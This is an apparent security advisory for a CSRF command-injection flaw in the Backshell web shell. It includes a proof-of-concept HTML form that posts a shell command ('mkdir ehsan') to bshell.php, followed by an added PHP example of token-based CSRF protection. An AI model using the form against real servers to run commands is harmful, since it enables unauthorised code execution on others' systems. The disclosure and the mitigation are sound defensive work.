Backshell Web Shell suffers from a cross-site request forgery vulnerability.
================================================================================
# Backshell Web Shell - CSRF Command Injection
================================================================================
# Vendor Homepage: https://github.com/neitanod/backshell
# Date: 25/12/2015
# Software Link: https://github.com/neitanod/backshell/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/bshell-csrf-rce.txt
================================================================================
# Exploit :
<form action="http://localhost/a/bshell.php" method="post">
<input type="hidden" name="cmd" value="mkdir ehsan">
<input type="submit" value="submit">
</form>
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
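The form above is accepted because the POST carrying `cmd` includes nothing that ties it to a page the application itself rendered. The following is an added example of the standard mitigation, a per-session synchronizer token plus a SameSite session cookie; it is not code from Backshell or from the advisory. The function names `csrf_token` and `csrf_valid` and the `csrf` field name are assumptions.

```php
<?php
// Added example: synchronizer-token CSRF check for a POST handler that
// accepts a "cmd" field. Names below are hypothetical, not Backshell's.
declare(strict_types=1);

session_start([
    'cookie_httponly' => true,
    'cookie_samesite' => 'Strict', // PHP >= 7.3: cookie not sent on cross-site POSTs
]);

// Create the per-session token once and reuse it for every rendered form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

// True only if the posted token matches the session token (constant-time).
function csrf_valid(array $post, array $session): bool
{
    $sent = $post['csrf'] ?? '';
    $want = $session['csrf'] ?? '';
    return is_string($sent) && is_string($want) && $want !== ''
        && hash_equals($want, $sent);
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_valid($_POST, $_SESSION)) {
        // A cross-site form like the one in the advisory has no token.
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
    // Token verified: the request came from a form this session rendered.
    // The application's existing handling of $_POST['cmd'] would run here.
}
?>
<form method="post">
  <input type="hidden" name="csrf" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="cmd">
  <input type="submit" value="submit">
</form>
```

The token check only addresses the forged cross-site request; the page still needs authentication in front of it.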